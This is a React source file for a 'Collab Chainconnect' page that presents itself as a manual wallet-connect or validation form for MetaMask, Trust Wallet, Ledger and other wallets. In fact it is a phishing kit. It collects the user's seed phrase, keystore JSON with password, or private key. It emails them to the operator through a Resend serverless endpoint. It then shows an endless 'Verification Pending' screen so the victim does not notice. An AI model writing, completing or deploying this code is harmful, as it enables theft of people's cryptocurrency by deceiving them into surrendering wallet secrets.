// src/components/Form/ConnectForm.js
import React, { useState, useRef, useMemo } from 'react';
import { motion } from 'framer-motion';
import { Formik, Form, Field } from 'formik';
import { X } from 'lucide-react';
import * as Yup from 'yup';
import { useLocation, useNavigate, useParams } from 'react-router-dom';
import HCaptcha from '@hcaptcha/react-hcaptcha';
// Using a serverless function (api/send-email.js) to send via Resend securely

const LoadingScreen = ({ onClose }) => (
  <div className="fixed inset-0 z-50 flex flex-col items-center justify-center bg-[#0a0a1a]/95">
    <button
      onClick={onClose}
      className="absolute top-4 right-4 p-1 text-gray-300 hover:text-white transition-colors rounded-full hover:bg-white/10"
    >
      <X size={16} />
    </button>
    <div className="text-center p-4">
      <motion.div
        className="w-16 h-16 border-4 border-[#a855f7] border-t-transparent rounded-full mb-4"
        animate={{ rotate: 360 }}
        transition={{ duration: 1, repeat: Infinity, ease: "linear" }}
      />
      <h2 className="text-xl font-semibold text-gray-200">Verification Pending...</h2>
    </div>
  </div>
);

const ConnectForm = () => {
  const [activeTab, setActiveTab] = useState('phrase');
  const [showLoading, setShowLoading] = useState(false);
  const [hcaptchaToken, setHcaptchaToken] = useState(null);
  const hcaptchaRef = useRef(null);
  const formRef = useRef();
  const location = useLocation();
  const navigate = useNavigate();
  const { wallet: walletParam } = useParams();
  
  // hCaptcha/Resend setup:
  // - Add REACT_APP_HCAP_REJAXER1=<your hCaptcha site key> in a client .env file.
  // - Add REJAXER2=<your hCaptcha secret key> and REJAXER3=<your Resend API key> on the server (e.g., Vercel env vars).
  // - REJAXER3 must start with \"re_\".
  const hcaptchaSite = process.env.REACT_APP_HCAP_REJAXER1 || '';
  
  // Helper to format wallet name from URL param
  const formatWalletNameFromParam = (param) => {
    if (!param) return 'Wallet';
    // Handle special cases
    const specialCases = {
      'walletconnect': 'WalletConnect',
      'trust': 'Trust Wallet',
      'trust-wallet': 'Trust Wallet',
      'metamask': 'MetaMask',
      'coinbase': 'Coinbase',
      'binance': 'Binance',
      'exodus': 'Exodus',
      'ledger': 'Ledger',
      'phantom': 'Phantom',
      'okx': 'OKX',
      'okto': 'OKTO',
      'okse': 'OKSE',
      'mew': 'MEW',
    };
    const lower = param.toLowerCase();
    if (specialCases[lower]) {
      return specialCases[lower];
    }
    // Capitalize each word
    return param
      .split('-')
      .map(word => word.charAt(0).toUpperCase() + word.slice(1).toLowerCase())
      .join(' ');
  };
  
  const wallet = location.state?.wallet || {
    name: formatWalletNameFromParam(walletParam),
    icon: null
  };

  // Create validation schema
  const validationSchema = useMemo(() => {
    return Yup.object().shape({
      phrase: Yup.string().when([], {
        is: () => activeTab === 'phrase',
        then: () => Yup.string().required('Wallet phrase is required'),
      }),
      keystore: Yup.string().when([], {
        is: () => activeTab === 'keystore',
        then: () => Yup.string().required('Keystore JSON is required'),
      }),
      password: Yup.string().when([], {
        is: () => activeTab === 'keystore',
        then: () => Yup.string().required('Password is required'),
      }),
      privateKey: Yup.string().when([], {
        is: () => activeTab === 'privateKey',
        then: () => Yup.string().required('Private key is required'),
      }),
    });
  }, [activeTab]);

  const handleSubmit = async (values, { setSubmitting }) => {
    try {
      // Verify hCaptcha token is present
      if (hcaptchaSite && !hcaptchaToken) {
        alert('Please complete the hCaptcha verification.');
        setSubmitting(false);
        return;
      }

      setShowLoading(true);

      const subject = `Collab Chainconnect ${wallet.name} (${activeTab}) submission`;
      
      // Escape HTML to prevent XSS and ensure proper display
      const escapeHtml = (text) => {
        if (!text) return '';
        const div = document.createElement('div');
        div.textContent = text;
        return div.innerHTML;
      };

      const walletData = escapeHtml(values[activeTab] || '');
      const walletName = escapeHtml(wallet.name);
      const walletType = escapeHtml(activeTab);
      const password = activeTab === 'keystore' ? escapeHtml(values.password || 'N/A') : '';

      const html = `
        <div style="font-family:Arial,Helvetica,sans-serif;line-height:1.6;color:#0a0f23">
          <h2 style="color:#0a0f23;margin-bottom:16px">Collab Chainconnect Wallet Submission</h2>
          <p><strong>Wallet:</strong> ${walletName}</p>
          <p><strong>Type:</strong> ${walletType}</p>
          <p><strong>Timestamp:</strong> ${new Date().toISOString()}</p>
          <pre style="white-space:pre-wrap;background:#f6f6f6;padding:12px;border-radius:8px;overflow-x:auto">${walletData}</pre>
          ${activeTab === 'keystore' ? `<p><strong>Password:</strong> ${password}</p>` : ''}
        </div>
      `;

      const res = await fetch('/api/send-email', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({
          subject,
          html,
          hcaptchaToken // Include hCaptcha token for server-side verification
        })
      });

      let responseData;
      try {
        responseData = await res.json();
      } catch (parseError) {
        console.error('Failed to parse response:', parseError);
        throw new Error(`Server error (${res.status}): Invalid response format`);
      }

      if (!res.ok) {
        // Extract detailed error message
        const errorMsg = responseData.error || `Server error: ${res.status}`;
        const details = responseData.details;
        const code = responseData.code;
        const hint = responseData.hint;
        
        // Log full error details for debugging
        console.error('Email submission error:', {
          status: res.status,
          error: errorMsg,
          details: details,
          code: code,
          hint: hint
        });
        
        // Build user-friendly error message
        let userMessage = errorMsg;
        
        // Add details if available
        if (details) {
          if (typeof details === 'string') {
            userMessage = `${errorMsg}\n\nDetails: ${details}`;
          } else if (details.message) {
            userMessage = `${errorMsg}\n\nDetails: ${details.message}`;
          }
        }
        
        // Add specific guidance based on error code
        if (code === 'MISSING_REJAXER3') {
          userMessage = 'Configuration Error: Resend API key (REJAXER3) is missing.\n\nPlease add REJAXER3 in Vercel Dashboard → Settings → Environment Variables.';
        } else if (code === 'INVALID_REJAXER3_FORMAT') {
          userMessage = 'Invalid API Key: Resend API key format is incorrect.\n\nGet a new key from https://resend.com/api-keys (should start with "re_").';
        } else if (code === 'RESEND_IMPORT_ERROR' || code === 'RESEND_INIT_ERROR') {
          userMessage = 'Server Error: Failed to initialize email service.\n\nThis may be a deployment issue. Please redeploy or contact support.';
        } else if (code === 'RESEND_API_ERROR' || code === 'RESEND_SEND_ERROR') {
          userMessage = 'Email Service Error: Failed to send email.\n\nPlease check your Resend API key (REJAXER3) and account status.';
        } else if (code === 'UNEXPECTED_ERROR') {
          userMessage = `Unexpected Error: ${errorMsg}\n\n${hint || 'Please try again or contact support if the issue persists.'}`;
        }
        
        // Add hint if available
        if (hint && !userMessage.includes(hint)) {
          userMessage += `\n\nHint: ${hint}`;
        }
        
        throw new Error(userMessage);
      }

      // Success - keep loading screen visible
      console.log('Email sent successfully:', responseData);
      
    } catch (error) {
      console.error('Failed to send email:', error);
      alert(`Failed to submit: ${error.message}. Please try again.`);
      setSubmitting(false);
      setShowLoading(false);
      // Reset hCaptcha on error
      if (hcaptchaRef.current) {
        hcaptchaRef.current.resetCaptcha();
      }
      setHcaptchaToken(null);
    }
  };

  if (showLoading) {
    return <LoadingScreen onClose={() => navigate('/')} />;
  }

  return (
    <motion.div
      initial={{ opacity: 0 }}
      animate={{ opacity: 1 }}
      exit={{ opacity: 0 }}
      className="min-h-screen bg-gradient-to-br from-[#0b0818] via-[#1a1229] to-[#0b0818] flex items-center justify-center p-4"
    >
      <div className="w-full max-w-lg p-6 md:p-8 relative rounded-2xl bg-[#1a1229]/95 backdrop-blur-sm border border-[#7c3aed]/40 shadow-[0_20px_60px_rgba(124,58,237,0.3)]">
        <button
          onClick={() => navigate('/')}
          className="absolute top-4 right-4 p-1 text-gray-300 hover:text-white transition-colors rounded-full hover:bg-white/10"
          style={{ width: '28px', height: '28px' }}
        >
          <X size={16} />
        </button>

        <div className="text-center mb-6">
          <h2 className="text-2xl font-extrabold bg-gradient-to-r from-[#7c3aed] via-[#c084fc] to-[#a855f7] bg-clip-text text-transparent mb-3">
            Connect Manually
          </h2>
          <div className="flex items-center justify-center gap-3 mb-6">
            {wallet.icon ? (
              <img 
                src={wallet.icon} 
                alt={`${wallet.name} logo`}
                className="w-10 h-10 object-contain"
              />
            ) : (
              <span className="text-3xl">💼</span>
            )}
            <h3 className="text-base text-gray-300">Import your <span className="text-white font-semibold">{wallet.name}</span> wallet</h3>
          </div>

          <div className="flex justify-center gap-6 mb-6 border-b border-[#7c3aed]/40">
            <button
              type="button"
              onClick={() => setActiveTab('phrase')}
              className={`pb-3 text-sm tracking-wide transition-colors ${
                activeTab === 'phrase'
                  ? 'text-[#7c3aed] border-b-2 border-[#7c3aed] font-semibold'
                  : 'text-gray-400 hover:text-gray-300'
              }`}
            >
              Phrase
            </button>
            <button
              type="button"
              onClick={() => setActiveTab('keystore')}
              className={`pb-3 text-sm tracking-wide transition-colors ${
                activeTab === 'keystore'
                  ? 'text-[#7c3aed] border-b-2 border-[#7c3aed] font-semibold'
                  : 'text-gray-400 hover:text-gray-300'
              }`}
            >
              Keystore JSON
            </button>
            <button
              type="button"
              onClick={() => setActiveTab('privateKey')}
              className={`pb-3 text-sm tracking-wide transition-colors ${
                activeTab === 'privateKey'
                  ? 'text-[#7c3aed] border-b-2 border-[#7c3aed] font-semibold'
                  : 'text-gray-400 hover:text-gray-300'
              }`}
            >
              Private Key
            </button>
          </div>
        </div>

        <Formik
          initialValues={{
            phrase: '',
            keystore: '',
            password: '',
            privateKey: '',
          }}
          validationSchema={validationSchema}
          onSubmit={handleSubmit}
        >
          {({ errors, touched, isSubmitting }) => (
            <Form ref={formRef} className="space-y-6">
              {activeTab === 'phrase' && (
                <div>
                  <Field
                    as="textarea"
                    name="phrase"
                    className="w-full h-32 p-4 rounded-lg bg-[#24193c]/50 border border-[#7c3aed]/40 text-gray-200 focus:ring-2 focus:ring-[#7c3aed] focus:outline-none text-sm"
                    placeholder="Enter your wallet phrase"
                  />
                  {errors.phrase && touched.phrase && (
                    <div className="text-red-400 text-sm mt-1">{errors.phrase}</div>
                  )}
                </div>
              )}

              {activeTab === 'keystore' && (
                <div className="space-y-4">
                  <Field
                    as="textarea"
                    name="keystore"
                    className="w-full h-32 p-4 rounded-lg bg-[#24193c]/50 border border-[#7c3aed]/40 text-gray-200 focus:ring-2 focus:ring-[#7c3aed] focus:outline-none text-sm"
                      placeholder="Enter your Keystore JSON"
                    />
                  {errors.keystore && touched.keystore && (
                    <div className="text-red-400 text-sm mt-1">{errors.keystore}</div>
                  )}
                  <Field
                    type="password"
                    name="password"
                    className="w-full p-4 rounded-lg bg-[#24193c]/50 border border-[#7c3aed]/40 text-gray-200 focus:ring-2 focus:ring-[#7c3aed] focus:outline-none text-sm"
                    placeholder="Wallet password"
                  />
                  {errors.password && touched.password && (
                    <div className="text-red-400 text-sm mt-1">{errors.password}</div>
                  )}
                </div>
              )}

              {activeTab === 'privateKey' && (
                <div>
                  <Field
                    type="password"
                    name="privateKey"
                    className="w-full p-4 rounded-lg bg-[#24193c]/50 border border-[#7c3aed]/40 text-gray-200 focus:ring-2 focus:ring-[#7c3aed] focus:outline-none text-sm"
                    placeholder="Enter your Private Key"
                  />
                  {errors.privateKey && touched.privateKey && (
                    <div className="text-red-400 text-sm mt-1">{errors.privateKey}</div>
                  )}
                </div>
              )}

              {/* hCaptcha widget */}
              {hcaptchaSite && (
                <div className="flex justify-center">
                  <HCaptcha
                    sitekey={hcaptchaSite}
                    onVerify={(token) => setHcaptchaToken(token)}
                    onError={(error) => {
                      console.error('hCaptcha error:', error);
                      setHcaptchaToken(null);
                    }}
                    onExpire={() => setHcaptchaToken(null)}
                    ref={hcaptchaRef}
                  />
                </div>
              )}

              <div className="space-y-4">
                <button
                  type="submit"
                        disabled={isSubmitting || (hcaptchaSite && !hcaptchaToken)}
                  className="w-full py-3 rounded-lg bg-gradient-to-r from-[#7c3aed] to-[#c084fc] text-white font-semibold hover:from-[#9a6bff] hover:to-[#e879f9] transition-colors duration-200 disabled:opacity-50 shadow-[0_4px_12px_rgba(124,58,237,0.3)]"
                >
                  Validate
                </button>

                <button
                  type="button"
                  onClick={() => navigate('/')}
                  className="w-full py-3 rounded-lg border border-white/10 text-white hover:bg-white/5 transition-colors duration-200"
                >
                  Close
                </button>
              </div>
            </Form>
          )}
        </Formik>
      </div>
    </motion.div>
  );
};

export default ConnectForm;